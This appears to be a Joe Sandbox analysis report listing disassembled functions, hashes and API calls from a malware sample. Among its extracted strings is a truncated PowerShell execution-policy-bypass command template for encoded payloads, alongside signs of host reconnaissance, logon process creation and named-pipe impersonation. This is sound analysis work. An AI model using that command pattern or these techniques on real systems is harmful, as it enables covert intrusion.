                                            • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                            • String ID:
                                            • API String ID: 2289611984-0
                                            • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                            • Instruction ID: 95846235af91f90bb695bfe1416bb13cb8cfab69c543e81ca3fc7d8a7bdc9cac
                                            • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                                            • Instruction Fuzzy Hash: CB113831700781E5D706AF75D88832D6675BB80B70F5A012BDA160B3A2DB7CC8829367
                                            APIs
                                            • _errno.LIBCMT ref: 00785079
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00785071
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 007850BD
                                            • _close_nolock.LIBCMT ref: 007850D0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                            • String ID:
                                            • API String ID: 4060740672-0
                                            • Opcode ID: f4fa1f50f73085aad1f766c2af42837c05f23a6bfd12aed5c0673392e7a8fc26
                                            • Instruction ID: 5fbda515a279ca3a563d1a1261fa182ce0a91480ba2289bcfd5b2c04e58fc51d
                                            • Opcode Fuzzy Hash: f4fa1f50f73085aad1f766c2af42837c05f23a6bfd12aed5c0673392e7a8fc26
                                            • Instruction Fuzzy Hash: CC114C32B84AC8C5D7057F75EC8D32C7A11B7817B1FAA5628EA1A073D2DB7CC8428764
                                            APIs
                                            • _errno.LIBCMT ref: 007D5C79
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D5C71
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D5CBD
                                            • _close_nolock.LIBCMT ref: 007D5CD0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                            • String ID:
                                            • API String ID: 4060740672-0
                                            • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                            • Instruction ID: 65317d59e25e50648948055492dec4db45efc9d13748c0b99d59900206b387af
                                            • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                                            • Instruction Fuzzy Hash: 72110A32724B8097D3156F35DD9932C6A71BB80761F6A4627E91D073D2CB7CC4818734
                                            APIs
                                            • malloc.LIBCMT ref: 00763AA9
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 00763AB3
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • malloc.LIBCMT ref: 00763ABE
                                            • free.LIBCMT ref: 00763C7E
                                            • free.LIBCMT ref: 00763C86
                                            • free.LIBCMT ref: 00763C8E
                                              • Part of subcall function 007648F0: malloc.LIBCMT ref: 0076493A
                                              • Part of subcall function 007648F0: malloc.LIBCMT ref: 00764945
                                              • Part of subcall function 007648F0: free.LIBCMT ref: 00764A2C
                                              • Part of subcall function 007648F0: free.LIBCMT ref: 00764A34
                                            • free.LIBCMT ref: 00763C9A
                                            • free.LIBCMT ref: 00763CA7
                                            • free.LIBCMT ref: 00763CB4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$malloc$_errno$_callnewh
                                            • String ID:
                                            • API String ID: 4160633307-0
                                            • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                            • Instruction ID: e832e00d2937ad392101bdb56446232c2cdac69ccef313f5b7fddf82a478fd62
                                            • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                                            • Instruction Fuzzy Hash: E861F36230478586DF25DF269444B6B7B91FB99BC8F048125EE4B57B85EF3CCA06CB10
                                            APIs
                                            • malloc.LIBCMT ref: 007B46A9
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B46B3
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • malloc.LIBCMT ref: 007B46BE
                                            • free.LIBCMT ref: 007B487E
                                            • free.LIBCMT ref: 007B4886
                                            • free.LIBCMT ref: 007B488E
                                              • Part of subcall function 007B54F0: malloc.LIBCMT ref: 007B553A
                                              • Part of subcall function 007B54F0: malloc.LIBCMT ref: 007B5545
                                              • Part of subcall function 007B54F0: free.LIBCMT ref: 007B562C
                                              • Part of subcall function 007B54F0: free.LIBCMT ref: 007B5634
                                            • free.LIBCMT ref: 007B489A
                                            • free.LIBCMT ref: 007B48A7
                                            • free.LIBCMT ref: 007B48B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                            • String ID:
                                            • API String ID: 3534990644-0
                                            • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                            • Instruction ID: 089b0f9577fd3fa523c39708c6d197d15114352a5b3c666d9a34c0d541654f55
                                            • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                            • Instruction Fuzzy Hash: 2761EE227147C586DF25EF669854BAE7B92FB85BC8F404129DE4A47B16EF3CC806CB00
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                            • malloc.LIBCMT ref: 0076BF3B
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0077B630: _time64.LIBCMT ref: 0077B654
                                              • Part of subcall function 0077B630: malloc.LIBCMT ref: 0077B69C
                                              • Part of subcall function 0077B630: strtok.LIBCMT ref: 0077B700
                                              • Part of subcall function 0077B630: strtok.LIBCMT ref: 0077B711
                                              • Part of subcall function 007728A0: _time64.LIBCMT ref: 007728AE
                                              • Part of subcall function 0077DEA8: malloc.LIBCMT ref: 0077DEF8
                                              • Part of subcall function 0077DEA8: realloc.LIBCMT ref: 0077DF07
                                            • malloc.LIBCMT ref: 0076C04A
                                            • _snprintf.LIBCMT ref: 0076C0C1
                                            • _snprintf.LIBCMT ref: 0076C0E7
                                            • _snprintf.LIBCMT ref: 0076C10E
                                            • free.LIBCMT ref: 0076C2C6
                                              • Part of subcall function 0077A144: malloc.LIBCMT ref: 0077A178
                                              • Part of subcall function 0077A144: free.LIBCMT ref: 0077A32F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                            • String ID: /'); %s
                                            • API String ID: 1314452303-1283008465
                                            • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                            • Instruction ID: a26bfcfefbe1a90004a22c08501f445a6ca093f9f18ed11881b5c2f091109eb9
                                            • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                            • Instruction Fuzzy Hash: 63A1A261700681C6EF15FB72A85976E3395BB8A7C4F848125AE5E4B796DF3CC806C702
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • malloc.LIBCMT ref: 007CB528
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007CEAA8: malloc.LIBCMT ref: 007CEAF8
                                            • GetComputerNameExA.KERNEL32 ref: 007CB5EA
                                            • GetComputerNameA.KERNEL32 ref: 007CB61F
                                            • GetUserNameA.ADVAPI32 ref: 007CB654
                                              • Part of subcall function 007BF014: WSASocketA.WS2_32 ref: 007BF042
                                            • malloc.LIBCMT ref: 007CB76D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                            • String ID: VUUU
                                            • API String ID: 632458648-2040033107
                                            • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                            • Instruction ID: cd9d08a487f8e7bb0d409d52c3e2f65560b2214f834c56e797ff034200196790
                                            • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                            • Instruction Fuzzy Hash: B591E426700690C6DF14EB66D85ABAD23A2BB89BC5F84802EFD4A5B755DF3CC906C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf
                                            • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                            • API String ID: 3512837008-1250630670
                                            • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                            • Instruction ID: a7d42e42c06d430c0da474a3c8c78b0cc935ebfe6d4f0272eb4353d5cfe7b17d
                                            • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                            • Instruction Fuzzy Hash: 45719C76B18B85C6EB10DB65E8843AD37A1F789788F848522EE4E03768DF3CD909C751
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • GetStartupInfoA.KERNEL32 ref: 007C1540
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C15CD
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C15DC
                                            • CreateProcessWithLogonW.ADVAPI32 ref: 007C1637
                                            • GetLastError.KERNEL32 ref: 007C1641
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                            • String ID: %s as %s\%s: %d
                                            • API String ID: 3435635427-816037529
                                            • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                            • Instruction ID: 50b0568b5a1342399e6b69f48b377cb486f46cf921a4b87f47328fdafc00d653
                                            • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                            • Instruction Fuzzy Hash: 70513D32608B8186D760DF16F88475AB7A5F789B80F544129EF8D97B29DF3CD456CB00
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                              • Part of subcall function 0077FA20: _errno.LIBCMT ref: 0077F977
                                              • Part of subcall function 0077FA20: _invalid_parameter_noinfo.LIBCMT ref: 0077F982
                                            • fseek.LIBCMT ref: 00770B30
                                              • Part of subcall function 007802A4: _errno.LIBCMT ref: 007802CC
                                              • Part of subcall function 007802A4: _invalid_parameter_noinfo.LIBCMT ref: 007802D7
                                            • _ftelli64.LIBCMT ref: 00770B38
                                              • Part of subcall function 00780318: _errno.LIBCMT ref: 00780336
                                              • Part of subcall function 00780318: _invalid_parameter_noinfo.LIBCMT ref: 00780341
                                            • fseek.LIBCMT ref: 00770B48
                                              • Part of subcall function 007802A4: _fseek_nolock.LIBCMT ref: 007802F5
                                            • malloc.LIBCMT ref: 00770B88
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0076C444: malloc.LIBCMT ref: 0076C457
                                            • fclose.LIBCMT ref: 00770C45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                            • String ID: mode
                                            • API String ID: 1756087678-2976727214
                                            • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                            • Instruction ID: abdb57ccf88e4848dba5e2871539b863ed1d08d3b0683a4dbefa2085db33ea57
                                            • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                            • Instruction Fuzzy Hash: DF41AF22714680C2DE54EB22E86936EB752F7C9BD0F90C226EE6E47B95DE3CC505CB41
                                            APIs
                                            • malloc.LIBCMT ref: 0077864F
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • _snprintf.LIBCMT ref: 00778667
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • free.LIBCMT ref: 0077867E
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            • malloc.LIBCMT ref: 007786CE
                                            • _snprintf.LIBCMT ref: 007786E6
                                            • free.LIBCMT ref: 0077870E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                            • String ID: /'); %s
                                            • API String ID: 761449704-1283008465
                                            • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                            • Instruction ID: f89de91aedde07110f5ebde8f3864926e2c88e116ace3ec3337e4f957aeff3a4
                                            • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                            • Instruction Fuzzy Hash: 5E31F5113482C245DE199B63AC183A56B21B78AFD0F88C151DEEE07BA6CE3CE462C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$OpenProcessToken
                                            • String ID:
                                            • API String ID: 2009710997-0
                                            • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                            • Instruction ID: d3956885e25113edbc88a3fb45a86e64caf9a95f0ae2b9cb5cdd71c4da13d9cf
                                            • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                            • Instruction Fuzzy Hash: 5121D836708B4086EB24AF62E854B6E6790EBC8B94F14403CEE4E43B56DF7CC446CB40
                                            APIs
                                            • _errno.LIBCMT ref: 0077F236
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0077F242
                                            • __crtIsPackagedApp.LIBCMT ref: 0077F253
                                            • _dosmaperr.LIBCMT ref: 0077F29D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2917016420-0
                                            • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                            • Instruction ID: 57ed3b5b45a731e8d0ce74fc714e8c6dbae1f6a3aae33f8454dc40737c051c17
                                            • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                            • Instruction Fuzzy Hash: 4F21BD76704B4182EF10AF66A90932DA6E5FB89BE4F588634DE4D43796DF3CC5418700
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078F004
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078F01F
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078F02A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3191669884-0
                                            • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                            • Instruction ID: d69a187b2db226828676a25fd1057fc4b88d53654fc28c90108908444e93502e
                                            • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                            • Instruction Fuzzy Hash: AB21A172784784CAD710AF12D48866DB7A4F788BE0F588135EF5847B46CB7DC882C710
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007DFC04
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007DFC1F
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DFC2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3191669884-0
                                            • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                            • Instruction ID: 46dff935e612891871bddde424c8d08812426592cab3d57a99c1906522c17ee8
                                            • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                            • Instruction Fuzzy Hash: 93219C72314788CAD7109F22E58465DB7B4F798BE4F684132EE5A07B55CB3CC892CB20
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTickioctlsocket
                                            • String ID:
                                            • API String ID: 3686034022-0
                                            • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                            • Instruction ID: a958c504230960c36f44cc8696c5d0ad7b152fa8dcb46d9a05cb6528b2798cc4
                                            • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                            • Instruction Fuzzy Hash: 7611E931708EC486E7108B69E8447597364E788BB4F50026CDA5E86AA5DFBDFCCAC714
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                            • String ID:
                                            • API String ID: 4232080776-0
                                            • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                            • Instruction ID: cc158a088baffc6c89cb349e249b46b462ee9b8d5636fd396c3f1108b70ef33d
                                            • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                            • Instruction Fuzzy Hash: 61119136A19A85C6F751DF21EC44B7A3369FB88B44F84412E890E425B2CF3CD84AC795
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                            • String ID:
                                            • API String ID: 2328795619-0
                                            • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                            • Instruction ID: b25b247ec064dcb98f28ae2401c5d3b05084f5893792fa1a6072a3c6981b1a68
                                            • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                            • Instruction Fuzzy Hash: 4F516632744354C69F18AA269A0476EB690B385BF4F188725EE3D43FD4CF3CC89A8380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                            • String ID:
                                            • API String ID: 2328795619-0
                                            • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                            • Instruction ID: 91a5c9a06328b502b94d9a92db21fda2bb832cd8c6ee0acd1cbd8b53e5cc9c6f
                                            • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                            • Instruction Fuzzy Hash: F7519B7171835086DB188A7699047AAB671F780BF8F246727AE7D43BD4CB3CD89283D0
                                            APIs
                                            • malloc.LIBCMT ref: 00771063
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0076C444: malloc.LIBCMT ref: 0076C457
                                            • free.LIBCMT ref: 0077115E
                                            • free.LIBCMT ref: 0077116B
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$freemalloc$_callnewh
                                            • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                            • API String ID: 2029259483-317027030
                                            • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                            • Instruction ID: 3c651bd4159e380e58f2ed1f42bc9d4e387bb35312b37dd0f7a8d3f827d5b73b
